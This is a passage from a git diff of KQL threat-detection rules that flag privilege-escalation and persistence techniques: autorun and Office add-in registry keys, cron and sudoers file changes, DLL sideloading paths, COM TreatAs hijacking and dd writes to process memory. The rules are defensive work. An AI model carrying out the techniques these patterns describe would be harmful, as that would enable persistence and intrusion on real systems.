"\\Contacts" or RegistryValueData contains "\\Music" or RegistryValueData contains "\\Pictures" or RegistryValueData contains "\\Documents" or RegistryValueData contains "\\Photos"))) and (not(((RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Windows\\Temp\\") and (RegistryValueData contains "rundll32.exe " and RegistryValueData contains "C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32") and InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\Download\\" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce*"))) and (not((RegistryValueData endswith "Spotify.exe --autostart --minimized" and (InitiatingProcessFolderPath endswith "C:\\Program Files\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe") and RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql index d15f18ab..fb1a6b4f 100644 --- a/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql @@ -1,13 +1,13 @@ -// Title: Office Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: Office Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where ((RegistryKey contains "\\Word\\Addins" or RegistryKey contains "\\PowerPoint\\Addins" or RegistryKey contains "\\Outlook\\Addins" or RegistryKey contains "\\Onenote\\Addins" or RegistryKey contains "\\Excel\\Addins" or RegistryKey contains "\\Access\\Addins" or RegistryKey contains "test\\Special\\Perf") and (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Office" or RegistryKey contains "\\Software\\Microsoft\\Office")) and (not((RegistryValueData =~ "(Empty)" or ((InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\regsvr32.exe") and (RegistryKey endswith "\\Excel\\Addins\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1*" or RegistryKey endswith "\\Excel\\Addins\\ExcelPlugInShell.PowerMapConnect*" or RegistryKey endswith "\\Excel\\Addins\\NativeShim*" or RegistryKey endswith "\\Excel\\Addins\\NativeShim.InquireConnector.1*" or RegistryKey endswith "\\Excel\\Addins\\PowerPivotExcelClientAddIn.NativeEntry.1*" or RegistryKey endswith "\\Outlook\\AddIns\\AccessAddin.DC*" or RegistryKey endswith "\\Outlook\\AddIns\\ColleagueImport.ColleagueImportAddin*" or RegistryKey endswith "\\Outlook\\AddIns\\EvernoteCC.EvernoteContactConnector*" or RegistryKey endswith "\\Outlook\\AddIns\\EvernoteOLRD.Connect*" or RegistryKey endswith "\\Outlook\\Addins\\Microsoft.VbaAddinForOutlook.1*" or RegistryKey endswith "\\Outlook\\Addins\\OcOffice.OcForms*" or RegistryKey contains "\\Outlook\\Addins\\OneNote.OutlookAddin" or RegistryKey endswith "\\Outlook\\Addins\\OscAddin.Connect*" or RegistryKey endswith "\\Outlook\\Addins\\OutlookChangeNotifier.Connect*" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.LyncAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.UCAddin.1" or RegistryKey endswith "\\Outlook\\Addins\\UmOutlookAddin.FormRegionAddin*" or RegistryKey contains "AddinTakeNotesService\\FriendlyName")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt*")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql b/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql index 2bdb2f95..67fee9f5 100644 --- a/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql +++ b/KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql @@ -1,12 +1,12 @@ -// Title: Outlook Macro Execution Without Warning Setting Enabled -// Author: @ScoubiMtl -// Date: 2021-04-05 -// Level: high -// Description: Detects the modification of Outlook security setting to allow unprompted execution of macros. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Outlook Macro Execution Without Warning Setting Enabled +// Author: @ScoubiMtl +// Date: 2021-04-05 +// Level: high +// Description: Detects the modification of Outlook security setting to allow unprompted execution of macros. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\Security\\Level" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql b/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql index a40c936b..1c952b92 100644 --- a/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql +++ b/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql @@ -1,12 +1,12 @@ -// Title: Password Set to Never Expire via WMI -// Author: Daniel Koifman (KoifSec) -// Date: 2025-07-30 -// Level: medium -// Description: Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1047, attack.t1098 -// False Positives: -// - Legitimate administrative activity - -DeviceProcessEvents +// Title: Password Set to Never Expire via WMI +// Author: Daniel Koifman (KoifSec) +// Date: 2025-07-30 +// Level: medium +// Description: Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1047, attack.t1098 +// False Positives: +// - Legitimate administrative activity + +DeviceProcessEvents | where (ProcessCommandLine contains "useraccount" and ProcessCommandLine contains " set " and ProcessCommandLine contains "passwordexpires" and ProcessCommandLine contains "false") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql b/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql index 5a6ded70..67bbd623 100644 --- a/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql +++ b/KQL/rules/Privilege Escalation/persistence_via_cron_files.kql @@ -1,12 +1,12 @@ -// Title: Persistence Via Cron Files -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC -// Date: 2021-10-15 -// Level: medium -// Description: Detects creation of cron file or files in Cron directories which could indicates potential persistence. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003 -// False Positives: -// - Any legitimate cron file. - -DeviceFileEvents +// Title: Persistence Via Cron Files +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-10-15 +// Level: medium +// Description: Detects creation of cron file or files in Cron directories which could indicates potential persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003 +// False Positives: +// - Any legitimate cron file. + +DeviceFileEvents | where (FolderPath startswith "/etc/cron.d/" or FolderPath startswith "/etc/cron.daily/" or FolderPath startswith "/etc/cron.hourly/" or FolderPath startswith "/etc/cron.monthly/" or FolderPath startswith "/etc/cron.weekly/" or FolderPath startswith "/var/spool/cron/crontabs/") or (FolderPath contains "/etc/cron.allow" or FolderPath contains "/etc/cron.deny" or FolderPath contains "/etc/crontab") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql b/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql index fed1a190..ec5d0c5b 100644 --- a/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql +++ b/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql @@ -1,12 +1,12 @@ -// Title: Persistence Via Sudoers Files -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-05 -// Level: medium -// Description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003 -// False Positives: -// - Creation of legitimate files in sudoers.d folder part of administrator work - -DeviceFileEvents +// Title: Persistence Via Sudoers Files +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-05 +// Level: medium +// Description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003 +// False Positives: +// - Creation of legitimate files in sudoers.d folder part of administrator work + +DeviceFileEvents | where FolderPath startswith "/etc/sudoers.d/" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql b/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql index 03fea458..0c6a79b8 100644 --- a/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql +++ b/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql @@ -1,12 +1,12 @@ -// Title: Potential COM Object Hijacking Via TreatAs Subkey - Registry -// Author: Kutepov Anton, oscd.community -// Date: 2019-10-23 -// Level: medium -// Description: Detects COM object hijacking via TreatAs subkey -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 -// False Positives: -// - Maybe some system utilities in rare cases use linking keys for backward compatibility - -DeviceRegistryEvents +// Title: Potential COM Object Hijacking Via TreatAs Subkey - Registry +// Author: Kutepov Anton, oscd.community +// Date: 2019-10-23 +// Level: medium +// Description: Detects COM object hijacking via TreatAs subkey +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Maybe some system utilities in rare cases use linking keys for backward compatibility + +DeviceRegistryEvents | where (ActionType =~ "RegistryKeyCreated" and (RegistryKey endswith "HKU*" and RegistryKey endswith "Classes\\CLSID*" and RegistryKey contains "\\TreatAs")) and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql index b126ae78..f6d7fa30 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential DLL Injection Or Execution Using Tracker.exe -// Author: Avneet Singh @v3t0_, oscd.community -// Date: 2020-10-18 -// Level: medium -// Description: Detects potential DLL injection and execution using "Tracker.exe" -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.001 - -DeviceProcessEvents +// Title: Potential DLL Injection Or Execution Using Tracker.exe +// Author: Avneet Singh @v3t0_, oscd.community +// Date: 2020-10-18 +// Level: medium +// Description: Detects potential DLL injection and execution using "Tracker.exe" +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.001 + +DeviceProcessEvents | where ((ProcessCommandLine contains " /d " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\tracker.exe" or ProcessVersionInfoFileDescription =~ "Tracker")) and (not((ProcessCommandLine contains " /ERRORREPORT:PROMPT " or (InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\MSBuild.exe" or InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\amd64\\MSBuild.exe")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql index fe67df0a..071a7635 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql @@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Of DbgModel.DLL -// Author: Gary Lobermier -// Date: 2024-07-11 -// Level: medium -// Description: Detects potential DLL sideloading of "DbgModel.dll" -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Legitimate applications loading their own versions of the DLL mentioned in this rule - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Of DbgModel.DLL +// Author: Gary Lobermier +// Date: 2024-07-11 +// Level: medium +// Description: Detects potential DLL sideloading of "DbgModel.dll" +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule + +DeviceImageLoadEvents | where FolderPath endswith "\\dbgmodel.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not((FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WinDbg_" or (FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql index 259d82d6..8bcf8538 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql @@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Of MpSvc.DLL -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema -// Date: 2024-07-11 -// Level: medium -// Description: Detects potential DLL sideloading of "MpSvc.dll". -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Legitimate applications loading their own versions of the DLL mentioned in this rule. - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Of MpSvc.DLL +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema +// Date: 2024-07-11 +// Level: medium +// Description: Detects potential DLL sideloading of "MpSvc.dll". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule. + +DeviceImageLoadEvents | where FolderPath endswith "\\MpSvc.dll" and (not((FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql index 9669b6a4..891cc995 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql @@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Of MsCorSvc.DLL -// Author: Wietze Beukema -// Date: 2024-07-11 -// Level: medium -// Description: Detects potential DLL sideloading of "mscorsvc.dll". -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Legitimate applications loading their own versions of the DLL mentioned in this rule. - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Of MsCorSvc.DLL +// Author: Wietze Beukema +// Date: 2024-07-11 +// Level: medium +// Description: Detects potential DLL sideloading of "mscorsvc.dll". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule. + +DeviceImageLoadEvents | where FolderPath endswith "\\mscorsvc.dll" and (not((FolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql index ee418ee3..fa36580e 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential DLL Sideloading Using Coregen.exe -// Author: frack113 -// Date: 2022-12-31 -// Level: medium -// Description: Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.t1055 - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Using Coregen.exe +// Author: frack113 +// Date: 2022-12-31 +// Level: medium +// Description: Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.t1055 + +DeviceImageLoadEvents | where InitiatingProcessFolderPath endswith "\\coregen.exe" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Program Files\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql index 1016a14b..60eff39e 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql @@ -1,11 +1,11 @@ -// Title: Potential DLL Sideloading Via DeviceEnroller.EXE -// Author: @gott_cyber -// Date: 2022-08-29 -// Level: medium -// Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". -// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 - -DeviceProcessEvents +// Title: Potential DLL Sideloading Via DeviceEnroller.EXE +// Author: @gott_cyber +// Date: 2022-08-29 +// Level: medium +// Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". +// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 + +DeviceProcessEvents | where ProcessCommandLine contains "/PhoneDeepLink" and (FolderPath endswith "\\deviceenroller.exe" or ProcessVersionInfoOriginalFileName =~ "deviceenroller.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql index afa1f482..f0e46043 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql @@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Via VMware Xfer -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-02 -// Level: high -// Description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Via VMware Xfer +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-02 +// Level: high +// Description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where (FolderPath endswith "\\glib-2.0.dll" and InitiatingProcessFolderPath endswith "\\VMwareXferlogs.exe") and (not(FolderPath startswith "C:\\Program Files\\VMware\\")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql b/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql index 20104c27..1337b527 100644 --- a/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql +++ b/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql @@ -1,10 +1,10 @@ -// Title: Potential Initial Access via DLL Search Order Hijacking -// Author: Tim Rauch (rule), Elastic (idea) -// Date: 2022-10-21 -// Level: medium -// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1566, attack.t1566.001, attack.initial-access, attack.t1574, attack.t1574.001, attack.defense-evasion - -DeviceFileEvents +// Title: Potential Initial Access via DLL Search Order Hijacking +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-21 +// Level: medium +// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1566, attack.t1566.001, attack.initial-access, attack.t1574, attack.t1574.001, attack.defense-evasion + +DeviceFileEvents | where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath contains "\\api-ms-win-core-")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql b/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql index 4751f88a..448dc75f 100644 --- a/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql +++ b/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql @@ -1,10 +1,10 @@ -// Title: Potential Linux Process Code Injection Via DD Utility -// Author: Joseph Kamau -// Date: 2023-12-01 -// Level: medium -// Description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.009 - -DeviceProcessEvents +// Title: Potential Linux Process Code Injection Via DD Utility +// Author: Joseph Kamau +// Date: 2023-12-01 +// Level: medium +// Description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.009 + +DeviceProcessEvents | where (ProcessCommandLine contains "of=" and ProcessCommandLine contains "/proc/" and ProcessCommandLine contains "/mem") and FolderPath endswith "/dd" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql index c84c2e75..37e3c542 100644 --- a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql +++ b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential Mpclient.DLL Sideloading -// Author: Bhabesh Raj -// Date: 2022-08-02 -// Level: high -// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Potential Mpclient.DLL Sideloading +// Author: Bhabesh Raj +// Date: 2022-08-02 +// Level: high +// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where (FolderPath endswith "\\mpclient.dll" and (InitiatingProcessFolderPath endswith "\\MpCmdRun.exe" or InitiatingProcessFolderPath endswith "\\NisSrv.exe")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql index 04c13655..41ff65ca 100644 --- a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql +++ b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql @@ -1,12 +1,12 @@ -// Title: Potential Mpclient.DLL Sideloading Via Defender Binaries -// Author: Bhabesh Raj -// Date: 2022-08-01 -// Level: high -// Description: Detects potential 